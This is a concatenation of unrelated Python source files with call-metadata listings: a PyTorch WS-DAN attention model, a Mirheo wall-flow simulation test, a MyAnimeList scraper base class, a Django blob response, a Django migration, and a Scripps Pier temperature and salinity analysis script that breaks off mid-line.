\'drop\'], but received unsupported augmentation method %s' % mode) class WSDAN_CAL(nn.Module): def __init__(self, num_classes, M=32, net='inception_mixed_6e', pretrained=False): super(WSDAN_CAL, self).__init__() self.num_classes = num_classes self.M = M self.net = net # Network Initialization if 'inception' in net: if net == 'inception_mixed_6e': self.features = inception_v3(pretrained=pretrained).get_features_mixed_6e() self.num_features = 768 elif net == 'inception_mixed_7c': self.features = inception_v3(pretrained=pretrained).get_features_mixed_7c() self.num_features = 2048 else: raise ValueError('Unsupported net: %s' % net) elif 'resnet' in net: self.features = getattr(resnet, net)(pretrained=pretrained).get_features() self.num_features = 512 * self.features[-1][-1].expansion elif 'coat' in net: self.features = getattr(coatnet, net)().get_features() if '0' in net or '1' in net: self.num_features = 768 elif '2' in net: self.num_features = 1026 elif '3' in net or '4' in net: self.num_features = 1536 else: raise ValueError('Not given valid CoAtNet size.') else: raise ValueError('Unsupported net: %s' % net) # Attention Maps self.attentions = BasicConv2d(self.num_features, self.M, kernel_size=1) # Bilinear Attention Pooling self.bap = BAP(pool='GAP') # Classification Layer self.fc = nn.Linear(self.M * self.num_features, self.num_classes, bias=False) logging.info('WSDAN: using {} as feature extractor, num_classes: {}, num_attentions: {}'.format(net, self.num_classes, self.M)) def visualize(self, x): batch_size = x.size(0) # Feature Maps, Attention Maps and Feature Matrix feature_maps = self.features(x) if self.net != 'inception_mixed_7c': attention_maps = self.attentions(feature_maps) else: attention_maps = feature_maps[:, :self.M, ...] # print(feature_maps.shape) # print(attention_maps.shape) feature_matrix = self.bap(feature_maps, attention_maps)[0] p = self.fc(feature_matrix * 100.) return p, attention_maps def forward(self, x): batch_size = x.size(0) # Feature Maps, Attention Maps and Feature Matrix feature_maps = self.features(x) if self.net != 'inception_mixed_7c': attention_maps = self.attentions(feature_maps) else: attention_maps = feature_maps[:, :self.M, ...] feature_matrix, feature_matrix_hat = self.bap(feature_maps, attention_maps) # Classification p = self.fc(feature_matrix * 100.) # Generate Attention Map if self.training: # Randomly choose one of attention maps Ak attention_map = [] for i in range(batch_size): attention_weights = torch.sqrt(attention_maps[i].sum(dim=(1, 2)).detach() + EPSILON) attention_weights = F.normalize(attention_weights, p=1, dim=0) k_index = np.random.choice(self.M, 2, p=attention_weights.cpu().numpy()) attention_map.append(attention_maps[i, k_index, ...]) attention_map = torch.stack(attention_map) # (B, 2, H, W) - one for cropping, the other for dropping else: attention_map = torch.mean(attention_maps, dim=1, keepdim=True) # (B, 1, H, W) return p, p - self.fc(feature_matrix_hat * 100.), feature_matrix, attention_map def load_state_dict(self, state_dict, strict=True): model_dict = self.state_dict() pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict and model_dict[k].size() == v.size()} if len(pretrained_dict) == len(state_dict): print('%s: All params loaded' % type(self).__name__) else: print('%s: Some params were not loaded:' % type(self).__name__) not_loaded_keys = [k for k in state_dict.keys() if k not in pretrained_dict.keys()] print(('%s, ' * (len(not_loaded_keys) - 1) + '%s') % tuple(not_loaded_keys)) model_dict.update(pretrained_dict) super(WSDAN_CAL, self).load_state_dict(model_dict)
[((26, 8, 26, 44), 'torch.nn.init.normal_', 'nn.init.normal_', (), '', True, 'import torch.nn as nn\n'), ((33, 8, 33, 62), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (), '', True, 'import torch.nn as nn\n'), ((34, 8, 34, 38), 'torch.nn.init.constant_', 'nn.init.constant_', ({(34, 26, 34, 32): 'm.bias', (34, 34, 34, 37): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((76, 25, 76, 64), 'torch.nn.functional.normalize', 'F.normalize', (), '', True, 'import torch.nn.functional as F\n'), ((86, 33, 86, 76), 'torch.nn.functional.normalize', 'F.normalize', (), '', True, 'import torch.nn.functional as F\n'), ((111, 22, 111, 51), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((165, 26, 165, 79), 'models.inception.BasicConv2d', 'BasicConv2d', (), '', False, 'from models.inception import inception_v3, BasicConv2d\n'), ((171, 18, 171, 85), 'torch.nn.Linear', 'nn.Linear', (), '', True, 'import torch.nn as nn\n'), ((28, 12, 28, 42), 'torch.nn.init.constant_', 'nn.init.constant_', ({(28, 30, 28, 36): 'm.bias', (28, 38, 28, 41): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((36, 8, 36, 61), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (), '', True, 'import torch.nn as nn\n'), ((52, 24, 52, 47), 'torch.nn.AdaptiveMaxPool2d', 'nn.AdaptiveMaxPool2d', ({(52, 45, 52, 46): '1'}, {}), '(1)', True, 'import torch.nn as nn\n'), ((60, 25, 60, 69), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((70, 29, 70, 61), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((73, 29, 73, 55), 'torch.sign', 'torch.sign', ({(73, 40, 73, 54): 'feature_matrix'}, {}), '(feature_matrix)', False, 'import torch\n'), ((81, 23, 81, 50), 'torch.ones_like', 'torch.ones_like', ({(81, 39, 81, 49): 'attentions'}, {}), '(attentions)', False, 'import torch\n'), ((84, 33, 84, 67), 'torch.sign', 'torch.sign', ({(84, 44, 84, 66): 'counterfactual_feature'}, {}), '(counterfactual_feature)', False, 'import torch\n'), ((102, 30, 102, 65), 'torch.nonzero', 'torch.nonzero', ({(102, 44, 102, 64): 'crop_mask[0, 0, ...]'}, {}), '(crop_mask[0, 0, ...])', False, 'import torch\n'), ((124, 21, 124, 49), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((217, 28, 217, 54), 'torch.stack', 'torch.stack', ({(217, 40, 217, 53): 'attention_map'}, {}), '(attention_map)', False, 'import torch\n'), ((219, 28, 219, 75), 'torch.mean', 'torch.mean', (), '', False, 'import torch\n'), ((38, 12, 38, 42), 'torch.nn.init.constant_', 'nn.init.constant_', ({(38, 30, 38, 36): 'm.bias', (38, 38, 38, 41): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((101, 24, 101, 73), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((109, 16, 110, 54), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((214, 36, 214, 78), 'torch.nn.functional.normalize', 'F.normalize', (), '', True, 'import torch.nn.functional as F\n'), ((41, 12, 41, 44), 'torch.nn.init.constant_', 'nn.init.constant_', ({(41, 30, 41, 38): 'm.weight', (41, 40, 41, 43): '(1.0)'}, {}), '(m.weight, 1.0)', True, 'import torch.nn as nn\n'), ((42, 12, 42, 42), 'torch.nn.init.constant_', 'nn.init.constant_', ({(42, 30, 42, 36): 'm.bias', (42, 38, 42, 41): '(0.0)'}, {}), '(m.bias, 0.0)', True, 'import torch.nn as nn\n'), ((73, 69, 73, 94), 'torch.abs', 'torch.abs', ({(73, 79, 73, 93): 'feature_matrix'}, {}), '(feature_matrix)', False, 'import torch\n'), ((79, 23, 79, 51), 'torch.zeros_like', 'torch.zeros_like', ({(79, 40, 79, 50): 'attentions'}, {}), '(attentions)', False, 'import torch\n'), ((82, 34, 82, 86), 'torch.einsum', 'torch.einsum', ({(82, 47, 82, 63): '"""imjk,injk->imn"""', (82, 65, 82, 85): '(fake_att, features)'}, {}), "('imjk,injk->imn', (fake_att, features))", False, 'import torch\n'), ((84, 81, 84, 114), 'torch.abs', 'torch.abs', ({(84, 91, 84, 113): 'counterfactual_feature'}, {}), '(counterfactual_feature)', False, 'import torch\n'), ((97, 26, 97, 48), 'random.uniform', 'random.uniform', ({(97, 41, 97, 47): '*theta'}, {}), '(*theta)', False, 'import random\n'), ((64, 30, 64, 84), 'torch.einsum', 'torch.einsum', ({(64, 43, 64, 59): '"""imjk,injk->imn"""', (64, 61, 64, 83): '(attentions, features)'}, {}), "('imjk,injk->imn', (attentions, features))", False, 'import torch\n'), ((119, 26, 119, 48), 'random.uniform', 'random.uniform', ({(119, 41, 119, 47): '*theta'}, {}), '(*theta)', False, 'import random\n'), ((123, 30, 123, 79), 'torch.nn.functional.upsample_bilinear', 'F.upsample_bilinear', (), '', True, 'import torch.nn.functional as F\n'), ((141, 32, 141, 67), 'models.inception.inception_v3', 'inception_v3', (), '', False, 'from models.inception import inception_v3, BasicConv2d\n'), ((144, 32, 144, 67), 'models.inception.inception_v3', 'inception_v3', (), '', False, 'from models.inception import inception_v3, BasicConv2d\n')]
noabauma/Mirheo
tests/walls/analytic/plates.py
bf7979bfbbf402d33c26ac5dc879f880e78e7017
#!/usr/bin/env python import mirheo as mir dt = 0.001 ranks = (1, 1, 1) domain = (8, 16, 8) force = (1.0, 0, 0) density = 4 u = mir.Mirheo(ranks, domain, dt, debug_level=3, log_filename='log', no_splash=True) pv = mir.ParticleVectors.ParticleVector('pv', mass = 1) ic = mir.InitialConditions.Uniform(number_density=density) u.registerParticleVector(pv=pv, ic=ic) dpd = mir.Interactions.Pairwise('dpd', rc=1.0, kind="DPD", a=10.0, gamma=50.0, kBT=1.0, power=0.5) u.registerInteraction(dpd) plate_lo = mir.Walls.Plane("plate_lo", (0, 0, -1), (0, 0, 1)) plate_hi = mir.Walls.Plane("plate_hi", (0, 0, 1), (0, 0, domain[2] - 1)) u.registerWall(plate_lo, 0) u.registerWall(plate_hi, 0) vv = mir.Integrators.VelocityVerlet("vv") frozen = u.makeFrozenWallParticles(pvName="plates", walls=[plate_lo, plate_hi], interactions=[dpd], integrator=vv, number_density=density) u.setWall(plate_lo, pv) u.setWall(plate_hi, pv) for p in (pv, frozen): u.setInteraction(dpd, p, pv) vv_dp = mir.Integrators.VelocityVerlet_withConstForce("vv_dp", force) u.registerIntegrator(vv_dp) u.setIntegrator(vv_dp, pv) sample_every = 2 dump_every = 1000 bin_size = (1., 1., 0.5) u.registerPlugins(mir.Plugins.createDumpAverage('field', [pv], sample_every, dump_every, bin_size, ["velocities"], 'h5/solvent-')) u.run(7002) # nTEST: walls.analytic.plates # cd walls/analytic # rm -rf h5 # mir.run --runargs "-n 2" ./plates.py # mir.avgh5 xy velocities h5/solvent-0000[4-7].h5 | awk '{print $1}' > profile.out.txt
[((13, 4, 13, 84), 'mirheo.Mirheo', 'mir.Mirheo', (), '', True, 'import mirheo as mir\n'), ((15, 5, 15, 55), 'mirheo.ParticleVectors.ParticleVector', 'mir.ParticleVectors.ParticleVector', (), '', True, 'import mirheo as mir\n'), ((16, 5, 16, 58), 'mirheo.InitialConditions.Uniform', 'mir.InitialConditions.Uniform', (), '', True, 'import mirheo as mir\n'), ((19, 6, 19, 98), 'mirheo.Interactions.Pairwise', 'mir.Interactions.Pairwise', (), '', True, 'import mirheo as mir\n'), ((22, 11, 22, 74), 'mirheo.Walls.Plane', 'mir.Walls.Plane', ({(22, 27, 22, 37): '"""plate_lo"""', (22, 39, 22, 49): '(0, 0, -1)', (22, 51, 22, 73): '(0, 0, 1)'}, {}), "('plate_lo', (0, 0, -1), (0, 0, 1))", True, 'import mirheo as mir\n'), ((23, 11, 23, 74), 'mirheo.Walls.Plane', 'mir.Walls.Plane', ({(23, 27, 23, 37): '"""plate_hi"""', (23, 39, 23, 49): '(0, 0, 1)', (23, 51, 23, 73): '(0, 0, domain[2] - 1)'}, {}), "('plate_hi', (0, 0, 1), (0, 0, domain[2] - 1))", True, 'import mirheo as mir\n'), ((27, 5, 27, 41), 'mirheo.Integrators.VelocityVerlet', 'mir.Integrators.VelocityVerlet', ({(27, 36, 27, 40): '"""vv"""'}, {}), "('vv')", True, 'import mirheo as mir\n'), ((37, 8, 37, 69), 'mirheo.Integrators.VelocityVerlet_withConstForce', 'mir.Integrators.VelocityVerlet_withConstForce', ({(37, 54, 37, 61): '"""vv_dp"""', (37, 63, 37, 68): 'force'}, {}), "('vv_dp', force)", True, 'import mirheo as mir\n'), ((46, 18, 46, 129), 'mirheo.Plugins.createDumpAverage', 'mir.Plugins.createDumpAverage', ({(46, 48, 46, 55): '"""field"""', (46, 57, 46, 61): '[pv]', (46, 63, 46, 75): 'sample_every', (46, 77, 46, 87): 'dump_every', (46, 89, 46, 97): 'bin_size', (46, 99, 46, 113): "['velocities']", (46, 115, 46, 128): '"""h5/solvent-"""'}, {}), "('field', [pv], sample_every, dump_every,\n bin_size, ['velocities'], 'h5/solvent-')", True, 'import mirheo as mir\n')]
XueAlfred/MALAnalysis
scraper-code/myanimelist/base.py
630d578b30f7540769774e1e4ee072d9775bf4bf
#!/usr/bin/python # -*- coding: utf-8 -*- import abc import bs4 import functools import utilities class Error(Exception): """Base exception class that takes a message to display upon raising. """ def __init__(self, message=None): """Creates an instance of Error. :type message: str :param message: A message to display when raising the exception. """ super(Error, self).__init__() self.message = message def __str__(self): return unicode(self.message) if self.message is not None else u"" class MalformedPageError(Error): """Indicates that a page on MAL has broken markup in some way. """ def __init__(self, id, html, message=None): super(MalformedPageError, self).__init__(message=message) if isinstance(id, unicode): self.id = id else: self.id = str(id).decode(u'utf-8') if isinstance(html, unicode): self.html = html else: self.html = str(html).decode(u'utf-8') def __str__(self): return "\n".join([ super(MalformedPageError, self).__str__(), "ID: " + self.id, "HTML: " + self.html ]).encode(u'utf-8') class InvalidBaseError(Error): """Indicates that the particular resource instance requested does not exist on MAL. """ def __init__(self, id, message=None): super(InvalidBaseError, self).__init__(message=message) self.id = id def __str__(self): return "\n".join([ super(InvalidBaseError, self).__str__(), "ID: " + unicode(self.id) ]) def loadable(func_name): """Decorator for getters that require a load() upon first access. :type func_name: function :param func_name: class method that requires that load() be called if the class's _attribute value is None :rtype: function :return: the decorated class method. """ def inner(func): cached_name = '_' + func.__name__ @functools.wraps(func) def _decorator(self, *args, **kwargs): if getattr(self, cached_name) is None: getattr(self, func_name)() return func(self, *args, **kwargs) return _decorator return inner class Base(object): """Abstract base class for MAL resources. Provides autoloading, auto-setting functionality for other MAL objects. """ __metaclass__ = abc.ABCMeta """Attribute name for primary reference key to this object. When an attribute by the name given by _id_attribute is passed into set(), set() doesn't prepend an underscore for load()ing. """ _id_attribute = "id" def __repr__(self): return u"".join([ "<", self.__class__.__name__, " ", self._id_attribute, ": ", unicode(getattr(self, self._id_attribute)), ">" ]) def __hash__(self): return hash('-'.join([self.__class__.__name__, unicode(getattr(self, self._id_attribute))])) def __eq__(self, other): return isinstance(other, self.__class__) and getattr(self, self._id_attribute) == getattr(other, other._id_attribute) def __ne__(self, other): return not self.__eq__(other) def __init__(self, session): """Create an instance of Base. :type session: :class:`myanimelist.session.Session` :param session: A valid MAL session. """ self.session = session @abc.abstractmethod def load(self): """A callback to run before any @loadable attributes are returned. """ pass def set(self, attr_dict): """Sets attributes of this user object. :type attr_dict: dict :param attr_dict: Parameters to set, with attribute keys. :rtype: :class:`.Base` :return: The current object. """ for key in attr_dict: if key == self._id_attribute: setattr(self, self._id_attribute, attr_dict[key]) else: setattr(self, u"_" + key, attr_dict[key]) return self
[((68, 5, 68, 26), 'functools.wraps', 'functools.wraps', ({(68, 21, 68, 25): 'func'}, {}), '(func)', False, 'import functools\n')]
BeryJu/p2
p2/core/http.py
80b5c6a821f90cef73d6e8cd3c6cdb05ffa86b27
"""p2 core http responses""" from wsgiref.util import FileWrapper from django.http import StreamingHttpResponse from p2.core.constants import ATTR_BLOB_MIME, ATTR_BLOB_SIZE_BYTES from p2.core.models import Blob class BlobResponse(StreamingHttpResponse): """Directly return blob's content. Optionally return as attachment if as_download is True""" def __init__(self, blob: Blob, chunk_size=8192): super().__init__(FileWrapper(blob, chunk_size)) self['Content-Length'] = blob.attributes.get(ATTR_BLOB_SIZE_BYTES, 0) self['Content-Type'] = blob.attributes.get(ATTR_BLOB_MIME, 'text/plain')
[((14, 25, 14, 54), 'wsgiref.util.FileWrapper', 'FileWrapper', ({(14, 37, 14, 41): 'blob', (14, 43, 14, 53): 'chunk_size'}, {}), '(blob, chunk_size)', False, 'from wsgiref.util import FileWrapper\n')]
callat-qcd/lattedb
lattedb/project/formfac/migrations/0009_auto_20200528_0907.py
75c06748f3d59332a84ec1b5794c215c5974a46f
# Generated by Django 3.0.6 on 2020-05-28 09:07 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('project_formfac', '0008_auto_20200408_0823'), ] operations = [ migrations.AlterField( model_name='concatenatedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='correlatormeta', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskconcatenatedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskcorrelatorh5dset', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='diskspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedsaveragedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedsaveragedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='disktslicedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='formfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='spectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapeconcatenatedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapecorrelatorh5dset', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapetslicedsaveragedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tapetslicedsaveragedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedsaveragedformfactor4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedsaveragedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='tslicedspectrum4dfile', name='user', field=models.ForeignKey(blank=True, help_text='User who updated this object. Set on save by connection to database. Anonymous if not found.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), ]
[((11, 8, 11, 65), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', ({(11, 40, 11, 64): 'settings.AUTH_USER_MODEL'}, {}), '(settings.AUTH_USER_MODEL)', False, 'from django.db import migrations, models\n'), ((19, 18, 19, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((24, 18, 24, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((29, 18, 29, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((34, 18, 34, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((39, 18, 39, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((44, 18, 44, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((49, 18, 49, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((54, 18, 54, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((59, 18, 59, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((64, 18, 64, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((69, 18, 69, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((74, 18, 74, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((79, 18, 79, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((84, 18, 84, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((89, 18, 89, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((94, 18, 94, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((99, 18, 99, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((104, 18, 104, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((109, 18, 109, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((114, 18, 114, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')]
mmstoll/Ocean569_Code
SIO_Code/SIO_coherence.py
228cb719f3e82f187f704f343d3b3590a38236d7
""" Data: Temperature and Salinity time series from SIO Scripps Pier Salinity: measured in PSU at the surface (~0.5m) and at depth (~5m) Temp: measured in degrees C at the surface (~0.5m) and at depth (~5m) - Timestamp included beginning in 1990 """ # imports import sys,os import pandas as pd import numpy as np import matplotlib.pyplot as plt import datetime from scipy import signal import scipy.stats as ss import SIO_modules as SIO_mod from importlib import reload reload(SIO_mod) # read in temp and sal files sal_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt', sep='\t', skiprows = 27) temp_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt', sep='\t', skiprows = 26) ENSO_data = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx') ENSO_data_recent = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx') PDO_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv', skiprows = 1) path_out = '/Users/MMStoll/Python/Output/Ocean569_Output/SIO_Output/' # convert year, month, day columns to single DATE column sal_data['DATE'] = pd.to_datetime(sal_data[['YEAR', 'MONTH', 'DAY']]) temp_data['DATE'] = pd.to_datetime(temp_data[['YEAR', 'MONTH', 'DAY']]) ENSO_data_all = ENSO_data.append(ENSO_data_recent[323:], ignore_index = True) PDO_data['DATE'] = pd.to_datetime(PDO_data['Date'], format='%Y%m') # remove uncertain data(SURF_FLAG between 1 and 4), replace with NaN, then interpolate for i in range(0,len(sal_data['SURF_SAL_PSU'])): if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4): sal_data['SURF_SAL_PSU'][i] = np.nan for i in range(0,len(temp_data['SURF_TEMP_C'])): if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4): sal_data['SURF_SAL_PSU'][i] = np.nan # interpolate missing temp and sal data sal_data['SURF_SAL_PSU'] = sal_data['SURF_SAL_PSU'].interpolate() temp_data['SURF_TEMP_C'] = temp_data['SURF_TEMP_C'].interpolate() sal_data['SURF_SAL_PSU'][0] = sal_data['SURF_SAL_PSU'][1] # remove the average from the sal and temp data and create new columns sal_data['SURF_SAL_PSU_NOAVG'] = sal_data['SURF_SAL_PSU'] - sal_data['SURF_SAL_PSU'].mean() temp_data['SURF_TEMP_C_NOAVG'] = temp_data['SURF_TEMP_C'] - temp_data['SURF_TEMP_C'].mean() # remove trends from the sal and temp data and create new columns sal_fit = np.polyfit(sal_data.index,sal_data['SURF_SAL_PSU_NOAVG'],1) sal_fit_fn = np.poly1d(sal_fit) temp_fit = np.polyfit(temp_data.index,temp_data['SURF_TEMP_C_NOAVG'],1) temp_fit_fn = np.poly1d(temp_fit) sal_fit_value = sal_fit_fn(sal_data.index) temp_fit_value = temp_fit_fn(temp_data.index) sal_data['SURF_SAL_PSU_DETREND'] = sal_data['SURF_SAL_PSU_NOAVG'] - sal_fit_value temp_data['SURF_TEMP_C_DETREND'] = temp_data['SURF_TEMP_C_NOAVG'] - temp_fit_value sal_tri = sal_data['SURF_SAL_PSU_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean() temp_tri = temp_data['SURF_TEMP_C_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean() # # 1. FFT the SIO Data # t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_data['SURF_TEMP_C_DETREND']) # # 2. Apply butterworth filter to SIO data, with cutoff equal to nyquist freq of enso index # fs = 1 # sampling frequency, once per day # fc = 1/60 # cut-off frequency of the filter (cut off periods shorter than 60 days) # w = fc / (fs / 2) #normalize the frequency # b, a = signal.butter(4, w, 'low') # temp_output = signal.filtfilt(b, a, t_spec) # # 3. Inverse FFT of filtered SIO data # temp_ifft = np.fft.irfft(temp_output,n=len(temp_output)) # # 4. Subsample new SIO time series with same delta t as ENSO index (once per month) # temp_ifft_sampled = np.mean(temp_ifft[0:18750].reshape(-1, 30), axis=1) # temp_ifft_len = temp_ifft_sampled[0:618] # x = np.linspace(0,18770, 18770) # plt.figure() # plt.loglog(x, temp_ifft) # plt.show() # butterworth low pass filter for temperature and salinity fs = 1 # sampling frequency, once per day fc = 1/500 # cut-off frequency of the filter (cut off periods shorter than 500 days) w = fc / (fs / 2) #normalize the frequency b, a = signal.butter(4, w, 'low') temp_output = signal.filtfilt(b, a, temp_tri) sal_output = signal.filtfilt(b, a, sal_tri) temp_sampled = np.mean(temp_output[0:37530].reshape(-1, 30), axis=1) #length = 1251 # create dataframe with spectra for each variable spectra_temp_df = pd.DataFrame(columns = ['Temp_freq', 'Temp_spec', 'Temp_fft']) spectra_sal_df = pd.DataFrame(columns = ['Sal_freq', 'Sal_spec', 'Sal_fft']) spectra_PDO_df = pd.DataFrame(columns = ['PDO_freq', 'PDO_spec', 'PDO_fft']) spectra_ENSO_df = pd.DataFrame(columns = ['ENSO_freq', 'ENSO_spec', 'ENSO_fft']) # for coherence, start all records at 1916-01-01 # ENSO data [20:] 1916-09-01 onward, monthly// ends now, through 2019-05-01 [:1254] # Temp data [10:] 1916-09-01 onward, daily // ends 2019-05-31 # PDO data [752:] 1916-09-01 onward, monthly// ends now, thorugh 2019-05-01 [:1985] # compute spectral variables for each variable for j in range(0,4): data_sets = [temp_sampled, sal_data['SURF_SAL_PSU_DETREND'], PDO_data['Value'][743:], ENSO_data_all['VALUE'][14:]] freq, spec, spec_amp, fft, delt, freq_T, 